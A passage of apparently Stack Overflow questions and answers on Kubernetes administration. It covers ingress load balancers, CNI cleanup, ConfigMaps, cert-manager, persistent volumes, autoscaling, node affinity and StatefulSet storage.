W1228 10:14:17.313074 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
W1228 10:14:17.320110 7 queue.go:130] requeuing &ObjectMeta{Name:sync status,GenerateName:,Namespace:,SelfLink:,UID:,ResourceVersion:,Generation:0,Cre
ationTimestamp:0001-01-01 00:00:00 +0000 UTC,DeletionTimestamp:<nil>,DeletionGracePeriodSeconds:nil,Labels:map[string]string{},Annotations:map[string]string
{},OwnerReferences:[],Finalizers:[],ClusterName:,Initializers:nil,}, err services "ingress-nginx" not found
<truncated>
</code></pre>
<p>The above error shows that the service is not running properly. No events are showing up in the describe service output either: </p>
<pre><code>~$ kubectl get service -n ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
default-http-backend ClusterIP 10.100.2.163 <none> 80/TCP 5h49m
ingress-nginx LoadBalancer 10.108.221.18 <pending> 80:32010/TCP,443:31271/TCP 170m
$kubectl describe service ingress-nginx -n ingress-nginx
Name: ingress-nginx
Namespace: ingress-nginx
Labels: app.kubernetes.io/name=ingress-nginx
app.kubernetes.io/part-of=ingress-nginx
Annotations: kubectl.kubernetes.io/last-applied-configuration:
{"apiVersion":"v1","kind":"Service","metadata":{"annotations":{"service.beta.kubernetes.io/aws-load-balancer-type":"nlb"},"label
s":{"app.k...
service.beta.kubernetes.io/aws-load-balancer-type: nlb
Selector: app.kubernetes.io/name=ingress-nginx,app.kubernetes.io/part-of=ingress-nginx
Type: LoadBalancer
IP: 10.108.221.18
Port: http 80/TCP
TargetPort: http/TCP
NodePort: http 32010/TCP
Endpoints: 10.244.0.4:80
Port: https 443/TCP
TargetPort: https/TCP
NodePort: https 31271/TCP
Endpoints: 10.244.0.4:443
Session Affinity: None
External Traffic Policy: Local
HealthCheck NodePort: 30401
Events: <none>
</code></pre>
<p>I know there is a service specification field <em>externalIPs</em>, but the expectation here is that once the ELB instance is created, it will be auto-populated:</p>
<pre><code>spec:
type: LoadBalancer
externalIPs:
- {{ ingress_lb_address or vip or masterIP }}
</code></pre>
<p>Please let me know if anything I'm missing here.</p>
| <p>Found the root cause. The <em>cloud provider</em> configuration is missing from the cluster, as the controller-manager log shows: </p>
<pre><code>~$ kubectl cluster-info dump | grep LoadBalancer
E1228 14:35:47.072444 1 core.go:76] Failed to start service controller: WARNING: no cloud provider provided, services of type LoadBalancer will fail
</code></pre>
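<p>For reference, a hedged sketch of what providing the cloud provider to kubeadm can look like on a v1.13-era cluster (field names vary by kubeadm version; the kubelets also need <code>--cloud-provider=aws</code>, and AWS resources such as instances, subnets and security groups should carry the <code>kubernetes.io/cluster/</code> tag for your cluster name):</p>
<pre><code># kubeadm init --config=config.yaml  (sketch only; verify against your kubeadm version)
apiVersion: kubeadm.k8s.io/v1beta1
kind: ClusterConfiguration
apiServer:
  extraArgs:
    cloud-provider: aws
controllerManager:
  extraArgs:
    cloud-provider: aws
</code></pre>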
|
<p>I am building my docker image with jenkins using:</p>
<pre><code>docker build --build-arg VCS_REF=$GIT_COMMIT \
--build-arg BUILD_DATE=`date -u +"%Y-%m-%dT%H:%M:%SZ"` \
--build-arg BUILD_NUMBER=$BUILD_NUMBER -t $IMAGE_NAME\
</code></pre>
<p>I was using Docker but I am migrating to k8.</p>
<p>With docker I could access those labels via:</p>
<pre><code>docker inspect --format "{{ index .Config.Labels \"$label\"}}" $container
</code></pre>
<p><b>How can I access those labels with Kubernetes ?</b></p>
<p>I am aware of adding those labels in the .Metadata.labels of my yaml files, but I don't like that much because<BR>
- it links that information to the deployment and not the container itself<BR>
- it can be modified anytime<BR>
...</p>
<pre><code>kubectl describe pods
</code></pre>
<p>Thank you</p>
| <p>Kubernetes doesn't expose that data. If it did, it would be part of the <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#podstatus-v1-core" rel="nofollow noreferrer">PodStatus</a> API object (and its embedded <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#containerstatus-v1-core" rel="nofollow noreferrer">ContainerStatus</a>), which is one part of the <a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.13/#pod-v1-core" rel="nofollow noreferrer">Pod</a> data that would get dumped out by <code>kubectl get pod deployment-name-12345-abcde -o yaml</code>.</p>
<p>You might consider encoding some of that data in the Docker image tag; for instance, if the CI system is building a tagged commit then use the source control tag name as the image tag, otherwise use a commit hash or sequence number. Another typical path is to use a deployment manager like <a href="https://helm.sh" rel="nofollow noreferrer">Helm</a> as the principal source of truth about deployments, and if you do that there can be a path from your CD system to Helm to Kubernetes that can pass along labels or annotations. You can also often set up software to know its own build date and source control commit ID at build time, and then expose that information via an informational-only API (like an HTTP <code>GET /_version</code> call or some such).</p>
|
<p>Quick question regarding Kubernetes job status.</p>
<p>Let's assume I submit my resource to 10 pods and want to check if my job completed successfully.</p>
<p>What are the best available options that we can use from kubectl commands?</p>
<p>I think of <code>kubectl get jobs</code>, but the problem here is that you have only two codes, 0 and 1 (1 for completion, 0 for failed or running), so we cannot really depend on this.</p>
<p>The other option is <code>kubectl describe</code> to check the pod status, i.e. out of 10 pods how many are completed/failed.</p>
<p>Any other effective way of monitoring the PODs? Please let me know</p>
| <p>Anything that can talk to the Kubernetes API can query for the Job object and look at its <code>JobStatus</code> field, which has info on which pods are running, completed, failed, or unavailable. <code>kubectl</code> is probably the easiest, as you mentioned, but you could write something more specialized using any client library if you wanted/needed to.</p>
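<p>For a quick check from the command line, a couple of examples using those status fields directly (a sketch; the job name is a placeholder):</p>
<pre><code># number of successfully completed pods for the job
kubectl get job my-job -o jsonpath='{.status.succeeded}'

# or block until the job reports the Complete condition (kubectl 1.11+)
kubectl wait --for=condition=complete job/my-job --timeout=300s
</code></pre>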
|
<p>I install kubernetes v1.11.5 from kubeadm with cni plugin flannel and everything is ok. But I after try to switch to calico I found that the cross machine pod communication is broken. So I switch back to flannel. But got error message when creating pod:</p>
<p><a href="https://i.stack.imgur.com/V8dN5.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/V8dN5.png" alt="enter image description here"></a></p>
<p>It seems that I need to reset cni network? But I don't know how to solve this problem. </p>
<p>My flannel and calico installation is follow <a href="https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/" rel="nofollow noreferrer">kubeadm instruction</a> with zero config update.</p>
| <p>I use following steps to remove old calico configs from kubernetes without <code>kubeadm reset</code>:</p>
<ol>
<li>clear ip route: <code>ip route flush proto bird</code></li>
<li>remove all calico links in all nodes <code>ip link list | grep cali | awk '{print $2}' | cut -c 1-15 | xargs -I {} ip link delete {}</code></li>
<li>remove ipip module <code>modprobe -r ipip</code></li>
<li>remove calico configs <code>rm /etc/cni/net.d/10-calico.conflist && rm /etc/cni/net.d/calico-kubeconfig</code></li>
<li>restart kubelet <code>service kubelet restart</code></li>
</ol>
<p>After those steps all the running pods won't be connected, so you have to delete all the pods, and then all the pods work. This has little influence if you are using a <code>replicaset</code>.</p>
|
<p>I am confused about the usage of Kubernetes on AWS, when AWS has already had a similar service, ECS, for a while. ECS also does a good job in container orchestration via json/yaml files. What are the advantages of Kubernetes over ECS? </p>
| <p>Both are container orchestration services. ECS is very well integrated with other Amazon Web Services. Kubernetes is cloud-neutral. You can find a good overview <a href="https://kubernetes.io/docs/concepts/overview/what-is-kubernetes/" rel="noreferrer">here</a> </p>
<p>Your requirements should tell you which one makes more sense for your needs. Here are some tips to help you understand how each product is positioned. Of course, there's a lot of overlapping and both products are very able to run a production workload.</p>
<p>Go Kubernetes (or <a href="https://aws.amazon.com/eks/" rel="noreferrer">EKS</a>, the AWS Managed Kubernetes service) if:</p>
<ul>
<li>You want cloud portability;</li>
<li>You want to deploy on-premise;</li>
<li>You want your developers to use the same tools that run your production workload.</li>
</ul>
<p>Go <a href="https://aws.amazon.com/ecs/" rel="noreferrer">ECS</a> (or <a href="https://aws.amazon.com/fargate/" rel="noreferrer">Fargate</a>, its managed version) if:</p>
<ul>
<li><p>You are comfortable configuring AWS (eg: auto-scaling groups, VPCs, elastic load balancers...);</p></li>
<li><p>You already have a workload running on EC2 and is gradually migrating it to containers;</p></li>
<li><p>You look for a service that is easier to learn; </p></li>
</ul>
|
<p>I have a spring boot web app which simply prints a property that is passed in a Kubernetes' ConfigMap.</p>
<p>This is my main class:</p>
<pre><code>@SpringBootApplication
@EnableDiscoveryClient
@RestController
public class DemoApplication {
private MyConfig config;
private DiscoveryClient discoveryClient;
@Autowired
public DemoApplication(MyConfig config, DiscoveryClient discoveryClient) {
this.config = config;
this.discoveryClient = discoveryClient;
}
@RequestMapping("/")
public String info() {
return config.getMessage();
}
public static void main(String[] args) {
SpringApplication.run(DemoApplication.class, args);
}
@RequestMapping("/services")
public String services() {
StringBuilder b = new StringBuilder();
discoveryClient.getServices().forEach((s) -> b.append(s).append(" , "));
return b.toString();
}
}
</code></pre>
<p>and the <code>MyConfig</code> class is:</p>
<pre><code>@Configuration
@ConfigurationProperties(prefix = "bean")
public class MyConfig {
private String message = "a message that can be changed live";
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
</code></pre>
<p>Basically, by invoking root resource I always get:</p>
<blockquote>
<p>a message that can be changed live</p>
</blockquote>
<p>And invoking /services I actually get a list of Kubernetes services.</p>
<p>I'm creating the ConfigMap with <code>kubectl create -f configmap-demo.yml</code> being the content:</p>
<pre><code>apiVersion: v1
kind: ConfigMap
metadata:
name: demo
data:
bean.message: This is an info from k8
</code></pre>
<p>And the deployment with <code>kubecetl create -f deploy-demo.yml</code> and the content is:</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: demo
labels:
app: demo
spec:
replicas: 1
selector:
matchLabels:
app: demo
template:
metadata:
labels:
app: demo
spec:
# this service account was created according to
# https://kubernetes.io/docs/reference/access-authn-authz/rbac/#service-account-permissions
# point 5 - Grant super-user access to all service accounts cluster-wide (strongly discouraged)
serviceAccountName: i18n-spring-k8
containers:
- name: demo
image: aribeiro/sck-demo
imagePullPolicy: Never
env:
- name: JAVA_OPTS
value:
ports:
- containerPort: 8080
volumes:
- name: demo
configMap:
name: demo
</code></pre>
<p>The problem is that when accessing the root resource <code>/</code> I always get the default hardcoded value and never what is defined in Kubernetes' ConfigMap.</p>
<p>Example project also with yaml files and Docker file available at <a href="https://drive.google.com/open?id=107IcwnYIbVpmwVgdgi8Dhx4nHEFAVxV8" rel="nofollow noreferrer">https://drive.google.com/open?id=107IcwnYIbVpmwVgdgi8Dhx4nHEFAVxV8</a> .</p>
<p>Also checked the startup DEBUG logs and I don't see any error or clue why it should not work.</p>
| <p>The <a href="https://github.com/spring-cloud/spring-cloud-kubernetes/blob/master/README.adoc#kubernetes-propertysource-implementations" rel="noreferrer">Spring Cloud Kubernetes documentation</a> is incomplete. It lacks the instruction to include this dependency to enable loading application properties from ConfigMaps:</p>
<pre><code><dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-kubernetes-config</artifactId>
</dependency>
</code></pre>
|
<p>I have been following <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-nginx-ingress-with-cert-manager-on-digitalocean-kubernetes" rel="nofollow noreferrer">this guide</a> to create an nginx-ingress which works fine. </p>
<p>Next I want to create a ClusterIssuer object called letsencrypt-staging, and use the Let's Encrypt staging server but get this error.</p>
<pre><code>kubectl create -f staging_issuer.yaml
</code></pre>
<blockquote>
<p>error: unable to recognize "staging_issuer.yaml": no matches for kind
"ClusterIssuer" in version "certmanager.k8s.io/v1alpha1"</p>
</blockquote>
<p>I have searched for solutions but can't find anything that works for me or that I can understand. What I found is mostly bug reports.</p>
<p>Here is my yaml file I used to create the ClusterIssuer.</p>
<pre><code>apiVersion: certmanager.k8s.io/v1alpha1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# The ACME server URL
server: https://acme-staging-v02.api.letsencrypt.org/directory
# Email address used for ACME registration
email: your_email_address_here
# Name of a secret used to store the ACME account private key
privateKeySecretRef:
name: letsencrypt-staging
# Enable the HTTP-01 challenge provider
http01: {}
</code></pre>
| <p>I fixed the problem by running <code>helm del --purge cert-manager</code></p>
<p>and then </p>
<pre><code>helm install --name cert-manager --namespace kube-system stable/cert-manager --set createCustomResource=true
</code></pre>
|
<p>I am trying to use sidecar mode in kubernetes to create a logs sidecar to expose specific container logs. And I am using kubernetes client to fetch logs from kubernetes api and send it out by websocket. The code shows below:</p>
<pre><code>func serveWs(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Access-Control-Allow-Origin", "*")
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
if _, ok := err.(websocket.HandshakeError); !ok {
log.Println(err)
}
return
}
defer conn.Close()
logsClient, err := InitKubeLogsClient(config.InCluster)
if err != nil {
log.Fatalln(err)
}
stream, err := logsClient.GetLogs(config.Namespace, config.PodName, config.ContainerName)
if err != nil {
log.Fatalln(err)
}
defer stream.Close()
reader := bufio.NewReader(stream)
for {
line, err := reader.ReadString('\n')
if err != nil {
log.Fatalln(err)
}
conn.WriteMessage(websocket.TextMessage, []byte(line))
}
}
</code></pre>
<p>I am using <a href="https://github.com/gorilla/websocket" rel="nofollow noreferrer">https://github.com/gorilla/websocket</a> as the websocket lib. And on the browser</p>
<p>Is this the best way to do what I want? Is there some better way to just expose the logs api from k8s to websocket?</p>
| <p>Put my final code here, thanks for the tips from @Peter:</p>
<pre><code>func serveWs(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Access-Control-Allow-Origin", "*")
conn, err := upgrader.Upgrade(w, r, nil)
if err != nil {
if _, ok := err.(websocket.HandshakeError); !ok {
log.Println(err)
}
return
}
log.Println("create new connection")
defer func() {
conn.Close()
log.Println("connection close")
}()
logsClient, err := InitKubeLogsClient(config.InCluster)
if err != nil {
log.Println(err)
return
}
stream, err := logsClient.GetLogs(config.Namespace, config.PodName, config.ContainerName)
if err != nil {
log.Println(err)
return
}
defer stream.Close()
reader := bufio.NewReaderSize(stream, 16)
lastLine := ""
for {
data, isPrefix, err := reader.ReadLine()
if err != nil {
log.Println(err)
return
}
lines := strings.Split(string(data), "\r")
length := len(lines)
if len(lastLine) > 0 {
lines[0] = lastLine + lines[0]
lastLine = ""
}
if isPrefix {
lastLine = lines[length-1]
lines = lines[:(length - 1)]
}
for _, line := range lines {
if err := conn.WriteMessage(websocket.TextMessage, []byte(line)); err != nil {
log.Println(err)
return
}
}
}
}
</code></pre>
|
<p>We have a setup, where Metricbeat is deployed as a DaemonSet on a Kubernetes cluster (specifically -- AWS EKS).</p>
<p>All seems to be functioning properly, but the <strong>kubelet</strong> connection.</p>
<p>To clarify, the following module:</p>
<pre><code>- module: kubernetes
enabled: true
metricsets:
- state_pod
period: 10s
hosts: ["kube-state-metrics.system:8080"]
</code></pre>
<p>works properly (the events flow into logstash/elastic).</p>
<p>This module configuration, however, doesn't work in any variants of hosts value (<code>localhost</code>/<code>kubernetes.default</code>/whatever):</p>
<pre><code>- module: kubernetes
period: 10s
metricsets:
- pod
hosts: ["localhost:10255"]
enabled: true
add_metadata: true
in_cluster: true
</code></pre>
<blockquote>
<p>NOTE: using cluster IP instead of localhost (so that it goes to
control plane) also works (although doesn't retrieve the needed
information, of course).</p>
<p>The configuration above was taken directly from the Metricbeat
documentation and immediately struck me as odd -- how does localhost
get translated (from within Metricbeat docker) to corresponding
kubelet?</p>
</blockquote>
<p>The error is, as one would expect, in light of the above:</p>
<pre><code>error making http request: Get http://localhost:10255/stats/summary:
dial tcp [::1]:10255: connect: cannot assign requested address
</code></pre>
<p>which indicates some sort of connectivity issue.</p>
<p>However, when SSH-ing to any node Metricbeat is deployed on, <code>http://localhost:10255/stats/summary</code> provides the correct output:</p>
<pre><code>{
"node": {
"nodeName": "...",
"systemContainers": [
{
"name": "pods",
"startTime": "2018-12-06T11:22:07Z",
"cpu": {
"time": "2018-12-23T06:54:06Z",
...
},
"memory": {
"time": "2018-12-23T06:54:06Z",
"availableBytes": 17882275840,
....
</code></pre>
<p>I must be missing something very obvious. Any suggestion would do.</p>
<p>NOTE: I cross-posted (and got no response for a couple of days) the same on <a href="https://discuss.elastic.co/t/metricbeat-kubernetes-module-cant-connect-to-kubelet/161939" rel="nofollow noreferrer">Elasticsearch Forums</a></p>
| <p>Inject the Pod's Node's IP via the <code>valueFrom</code> provider in the <code>env:</code> list:</p>
<pre><code>env:
- name: HOST_IP
valueFrom:
      fieldRef:
        fieldPath: status.hostIP
</code></pre>
<p>and then update the metricbeat config file to use the host's IP:</p>
<pre><code>hosts: ["${HOST_IP}:10255"]
</code></pre>
<p>which metricbeat will resolve via its <a href="https://www.elastic.co/guide/en/beats/libbeat/6.5/config-file-format-env-vars.html#config-file-format-env-vars" rel="noreferrer">environment variable config injection</a></p>
|
<p>I am getting error of </p>
<blockquote>
<p>1 node(s) didn't find available persistent volumes to bind.</p>
</blockquote>
<p>upon creating my pod to attach to Persistent Storage.</p>
<p>I have setup below. </p>
<p>The <code>PersistentVolume</code> and <code>StorageClass</code> are created and attached successfully.
Once I create the <code>PersistentVolumeClaim</code>, it waits in the "pending" state, which is expected (I believe) because
it waits for a pod to connect, due to the "<code>WaitForFirstConsumer</code>" setting of the <code>StorageClass</code>.</p>
<pre><code>apiVersion: v1
kind: PersistentVolume
metadata:
name: example-local-pv
spec:
capacity:
storage: 2Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Retain
storageClassName: local-storage
local:
path: /home/aozdemir/k8s
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- my-node
---
kind: StorageClass
apiVersion: storage.k8s.io/v1
metadata:
name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: WaitForFirstConsumer
---
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
name: example-local-claim
spec:
accessModes:
- ReadWriteOnce
storageClassName: local-storage
resources:
requests:
storage: 2Gi
---
kind: Pod
apiVersion: v1
metadata:
name: task-pv-pod
spec:
volumes:
- name: task-pv-storage
persistentVolumeClaim:
claimName: example-local-claim
containers:
- name: task-pv-container
image: nginx
ports:
- containerPort: 80
name: "http-server"
volumeMounts:
- mountPath: "/usr/share/nginx/html"
name: task-pv-storage
</code></pre>
<p>My problem is that, after I create the Pod, it gives following warning:</p>
<blockquote>
<p>0/1 nodes are available: 1 node(s) didn't find available persistent
volumes to bind.</p>
</blockquote>
<p>Here is screenshot:</p>
<p><a href="https://i.stack.imgur.com/fuehs.png" rel="noreferrer"><img src="https://i.stack.imgur.com/fuehs.png" alt="enter image description here"></a></p>
<p>Am I missing something here?</p>
| <p>It was my bad.
According to the following blog post: <a href="https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/" rel="noreferrer">https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/</a></p>
<blockquote>
<p>Note that there’s a new <strong>nodeAffinity</strong> field in the PersistentVolume
object: this is how the Kubernetes scheduler understands that this
PersistentVolume is tied to a specific node. nodeAffinity is a
<strong>required field for local PersistentVolumes</strong>.</p>
</blockquote>
<p>and my value was incorrect. I changed it to my node name, re-deployed, and it worked.</p>
|
<p>I am trying to use Jenkins to build and push docker images to private registry. However, while trying <code>docker login</code> command, I am getting this error:</p>
<pre><code>http: server gave HTTP response to HTTPS client
</code></pre>
<p>I know that this might be happening because the private registry is not added as an insecure registry. But, how I can resolve this in CI pipeline?</p>
<p>Jenkins is set up on a Kubernetes cluster and I am trying to automate the deployment of an application on the cluster.</p>
| <p>This has nothing to do with the Jenkins CI pipeline or Kubernetes. Jenkins will not be able to push your images until you follow one of the two steps below.</p>
<p>You have two options here</p>
<p>1) Configure your docker client to use the secure registry over HTTPS. This will include setting up self signed certificates or getting certificates from your local certificate authority.</p>
<p>2) The second solution is to use your registry over an unencrypted HTTP connection.
If you are running Docker on Kubernetes, you will have to configure the <code>daemon.json</code> file at <code>/etc/docker/daemon.json</code> on the host where the Docker daemon runs. </p>
<p>PS: This file might not exist. You will have to create it.</p>
<p>Then add in the below content. Make sure you change the url to match your docker registry</p>
<pre><code>{
"insecure-registries" : ["myregistrydomain.com:5000"]
}
</code></pre>
<p>Then restart docker using <code>systemctl restart docker</code> or <code>etc/init.d/docker restart</code> depending on the version of linux distro installed on your cluster</p>
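<p>For completeness, a minimal sketch of option 1 on a Linux host: Docker trusts per-registry CA certificates placed under <code>/etc/docker/certs.d</code>. The registry address and certificate file name below are assumptions; adjust them to your setup.</p>
<pre><code># assumed registry address and cert file name; adjust to your environment
sudo mkdir -p /etc/docker/certs.d/myregistrydomain.com:5000
sudo cp ca.crt /etc/docker/certs.d/myregistrydomain.com:5000/ca.crt
sudo systemctl restart docker
</code></pre>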
<p>Let me know if you have any questions</p>
|
<p>I want to create Kubernetes cluster with Terraform,</p>
<p>Regarding the doc page here: <a href="https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html" rel="nofollow noreferrer">https://www.terraform.io/docs/providers/alicloud/r/cs_managed_kubernetes.html</a></p>
<pre><code>variable "name" {
default = "my-first-k8s"
}
data "alicloud_zones" main {
available_resource_creation = "VSwitch"
}
data "alicloud_instance_types" "default" {
availability_zone = "${data.alicloud_zones.main.zones.0.id}"
cpu_core_count = 1
memory_size = 2
}
</code></pre>
<p>Where do I insert vswitch id? and how to set the region id?</p>
| <p><strong>To set region:</strong></p>
<p>While configuring Alicloud provider in Terraform itself you can set the region:</p>
<pre><code>provider "alicloud" {
access_key = "${var.access_key}"
secret_key = "${var.secret_key}"
region = "${var.region}"
}
</code></pre>
<p>For instance, let me consider <strong>Beijing</strong> as the region:</p>
<pre><code>provider "alicloud" {
access_key = "accesskey"
secret_key = "secretkey"
region = "cn-beijing"
}
</code></pre>
<p><strong>To set vswitch IDs:</strong></p>
<p>while defining the <code>resource</code> section we can insert the desired vswitches</p>
<pre><code>resource "alicloud_instance"{
# ...
instance_name = "in-the-vpc"
vswitch_id = "${data.alicloud_vswitches.vswitches_ds.vswitches.0.id}"
# ...
}
</code></pre>
<p>For instance, let me consider <strong>vsw-25naue4gz</strong> as the vswitch id:</p>
<pre><code>resource "alicloud_instance"{
# ...
vswitch_id = "vsw-25naue4gz"
# ...
}
</code></pre>
|
<p>Databases are designed to consume all memory, CPU and IO available to them.
Is there are good/bad reasons Docker should not be used for databases in production?</p>
<p>May be this question applies to other tools like MOMs Apache Kafka, Apache ActiveMQ etc.</p>
| <p>Docker is not a full-scale virtual machine (at least when run on Linux); a container is just another process running on the same kernel as the host machine. In fact, all <code>docker</code> container processes can be seen on the host machine with <code>ps aux</code>. </p>
<p>The only additional overhead <code>Docker</code> adds is another OS userland (filesystem and libraries) on top of your kernel, but most containers are built from extremely lightweight images like <code>alpine</code> Linux, so I don't think it really has to be taken into consideration.</p>
<p>From another point of view, having a database (or any other high-load service) in containers gives you the following advantages:</p>
<ul>
<li>Scaling (containers can easily be spread among nodes with container orchestration tools like <code>k8s</code>)</li>
<li>Easy deploy (all dependencies are inside)</li>
<li>Easy upgrade (just replace the container)</li>
<li>Easy testing (no need for db-cleaning procedures in advance of running tests), and others</li>
</ul>
<p>So deploying containerized services today is a right practice.</p>
|
<p>Does anyone know the correct procedure to bring down a kubernetes cluster gracefully?
I have K8s 1.12 running on bare metal (built with kubeadm on Ubuntu 16.04) in a lab. I want to bring down the cluster gracefully before I shut down the servers. Strangely this is not documented - so maybe that is handled when the system services are stopped; but I want to check.
Thanks</p>
| <p>The tear down section of the <a href="https://kubernetes.io/docs/setup/independent/create-cluster-kubeadm/#tear-down" rel="nofollow noreferrer">official documentation</a> says:</p>
<p>To undo what kubeadm did, you should first drain the node and make sure that the node is empty before shutting it down.</p>
<p>Talking to the master with the appropriate credentials, run:</p>
<pre><code>kubectl drain <node name> --delete-local-data --force --ignore-daemonsets
kubectl delete node <node name>
</code></pre>
<p>Then, on the node being removed, reset all kubeadm installed state:</p>
<pre><code>kubeadm reset
</code></pre>
|
<p>I am using Kubernetes HPA to scale up my cluster. I have set the target CPU utilization to 50%. It is scaling up properly, but when load decreases it scales down too fast. I want to set a cooldown period. For example, even if the CPU utilization is below 50%, it should wait for 60 sec before terminating a node.</p>
<p>I have checked this article, but it is not saying that I can change the default value in HPA, <a href="https://kubernetes.io/docs/concepts/workloads/pods/pod/index.html#termination-of-pods" rel="nofollow noreferrer">https://kubernetes.io/docs/concepts/workloads/pods/pod/index.html#termination-of-pods</a></p>
<p>Kops version :- 1.9.1</p>
| <p>This is configured at the HPA level: <a href="https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-cooldown-delay" rel="nofollow noreferrer">https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-cooldown-delay</a></p>
<blockquote>
<p>--horizontal-pod-autoscaler-downscale-delay: The value for this option is a duration that specifies how long the autoscaler has to wait before another downscale operation can be performed after the current one has completed. The default value is 5 minutes (5m0s).</p>
</blockquote>
|
<p>I am running a web service that can be accessed from my company's domain name.
I have setup automatic SSL certificates with Lets Encrypt as seen below.</p>
<p><code>apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: basic-ingress
annotations:
certmanager.k8s.io/issuer: letsencrypt
spec:
tls:
- hosts:
- my.domain.net
secretName: my-domain-net-tls
rules:
- host: my.domain.net
http:
paths:
- backend:
serviceName: frontend-service
servicePort: 80-to-8080-tcp
</code></p>
<p>I want to offer clients the option of serving the frontend from their own domains.
What is the best way to go about this with certificates?
I understand that I can setup the load balancer to use multiple secrets as shown here: <a href="https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-multi-ssl" rel="nofollow noreferrer">https://cloud.google.com/kubernetes-engine/docs/how-to/ingress-multi-ssl</a>,
but I will need to be serving from more than the stated max of 10 domains.</p>
<p>Is there a more efficient way to go about this? What's the industry standard for serving one frontend service from multiple domains?</p>
<p>Many thanks!</p>
| <p>The standard method to support more than one domain name and / or subdomain names is to use one SSL Certificate and implement SAN (Subject Alternative Names). The extra domain names are stored together in the SAN. All SSL certificates support SAN, but not all certificate authorities will issue multi-domain certificates. Let's Encrypt does support SAN so their certificates will meet your goal.</p>
<p><a href="https://www.ssl.com/faqs/what-is-a-san-certificate/" rel="nofollow noreferrer">What is a SAN Certificate?</a></p>
|
<p>I would like to know if it is possible for multiple pods in the same Kubernetes cluster to access a database which is configured using persistent volumes on a Google cloud persistent disk. </p>
<p>Currently I am building a microservices achitecture web app which has 3 node apis in different pods all accessing the same database. So how do I achieve this with kubernetes.</p>
<p>Kindly let me know if my architecture is right as well</p>
| <p>You can certainly connect multiple node-based app pods to the same database. It is sometimes said that microservices shouldn't share a database but this depends on what your apps are doing, the project history and the extent to which you want the parts to be worked on separately. </p>
<p>There are questions you have to answer about running databases at scale, such as your future load and whether you want to use relational databases if you're going to try to span availability zones. And there are
some specific to kubernetes, especially around how you associate DB Pods to data. See <a href="https://stackoverflow.com/a/53980021/9705485">https://stackoverflow.com/a/53980021/9705485</a>. Another popular option is to use a managed DB service from a cloud provider. If you do run the DB in k8s then I'd suggest looking for a helm chart or looking at an operator, such as the kubeDB operator, to avoid crafting the kubernetes descriptors yourself and to get more guidance on running the DB and setting it up. </p>
<p>If it's a new project and you've not used k8s before then you'll also have to decide where to host your code, your docker images and your deployment descriptors and how to setup your CI pipelines. If you've not got answers to these questions already then I'd suggest looking at Jenkins-X as it will provide you with out of the box defaults for a whole cluster and CI setup and a template ('build pack') for building node apps and deploying them to staging and prod environments through a pipeline.</p>
|
<p>i want to schedule 10 pods in two specific node(total 15 nodes in our kube cluster).</p>
<p>so in replication-controller file i am mentioning two values in nodeSelector
like below. </p>
<pre><code>nodeSelector:
app: node1
app: node2
</code></pre>
<p>problem is that all the time it's taking only node2.whatever sequence i am mentioning, it's taking last node only.</p>
<p>note: <code>node1</code> and <code>node2</code> are lables of node.</p>
| <p>A better way is to use node affinity with the <code>app</code> label you already have on the nodes, something like this:</p>
<pre><code> affinity:
nodeAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
nodeSelectorTerms:
- matchExpressions:
          - key: app
operator: In
values:
- node1
- node2
</code></pre>
|
<p>I am using a PVC with ReadWriteOnce access mode, which is used by a logstash Deployment which will run a stateful application and use this PVC.Each pod in the deployment will try to bind to the same persistent volume claim. In case of replicas > 1, it will fail (as it supports ReadWriteOnce, only the first one will be able to bind successfully). How do I specify that each pod is to be bound to a separate PV.</p>
<p>I don't want to define 3 separate yamls for each logstash replica / instance</p>
<pre><code>apiVersion: apps/v1
kind: Deployment
metadata:
name: logstash
spec:
replicas: 3
template:
metadata:
labels:
app: logstash
spec:
containers:
image: "logstash-image"
imagePullPolicy: IfNotPresent
name: logstash
volumeMounts:
- mountPath: /data
name: logstash-data
restartPolicy: Always
volumes:
- name: logstash-data
persistentVolumeClaim:
claimName: logstash-vol
</code></pre>
<p>Need a way to do volume mount of different PVs to different pod replicas. </p>
| <p>With Deployments you cannot do this properly. You should use StatefulSet with PVC template to achieve your target. The part of your StatefulSet YAML code snippet could look like this:</p>
<pre><code>...
volumeClaimTemplates:
- metadata:
name: pv-data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 5G
</code></pre>
<p>assuming you have 3 replicas, you will see the pods are created one by one sequentially, and the PVC is requested during the pod creation.</p>
<p>The PVC is named as
<code>volumeClaimTemplate name + StatefulSet name + ordinal number</code> (the pod name already ends with the ordinal), and as a result you will have the list of newly created PVCs:</p>
<pre><code>pv-data-<statefulset_name>-0
pv-data-<statefulset_name>-1
